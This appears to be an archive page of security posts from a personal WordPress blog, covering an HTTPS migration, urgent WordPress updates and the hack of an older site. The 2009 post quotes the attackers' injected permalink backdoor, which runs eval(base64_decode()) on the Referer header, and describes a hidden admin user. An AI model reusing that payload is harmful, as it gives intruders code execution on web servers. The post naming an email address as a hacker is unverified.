Security Archives • Eric Shefferman (DOT) Com

Converting this WordPress site from http: to https: – Part 2

November 5, 2018November 4, 2018 by Eric

One of the things that kept me from the change to SSL was that my hosting company, Pair.com, did not have any nice (convenient) way to use the free Let’s Encrypt SLL certificates.

Pair now offers an easy one click interface to set up SSL and they automatically renew the certificates, so there’s really no excuse to not do it.

What does the interface look like? You go to the Manage Your SSL page and look for the button next to your domain name that says:

Click the Let’s Encrypt button and you’re good to go!

After a few minutes (so that you think the computer was doing some really difficult task) it’ll present you with your domain name with a super-intelligent shade of green lock next to it. All done with the easy part!

Now for the less easy part…

You can’t go out this Friday night, it’s time to update WordPress to Version 3.4.2

September 7, 2012 by Eric

Holy mother of toad! Again! WordPress just loves to release those late in the week security updates. We already know how hackers work — they do a file compare of the old WordPress version to the new one, the write some code to exploit the vulnerability, and then they set the code loose on whatever … Read more

WordPress – Be Ready To Be Hacked Again

December 29, 2010December 29, 2010 by Eric

Ahh… the dreaded

3.0.4 Important Security Update

…a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

Yeah. What that says to me is, “A hacker has already looked at the vulnerabilities in 3.0.3 and written a script to exploit it and deployed it on the websites he/she has already hacked so that it can go out and get access to even more web servers by simply crawling the web looking for WordPress installations that haven’t been updated yet.”

Who is UlricheDmond ulrichedmondsuses@gmail.com ?

September 9, 2009September 8, 2009 by Eric

Another hacker username: UlricheDmond using the email address ulrichedmondsuses@gmail.com

WordPress Security Exploits – This site was hacked

September 7, 2009September 5, 2009 by Eric

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — javascript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the javascript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass javascript tricks.

Via Email Updates
Name:
Email: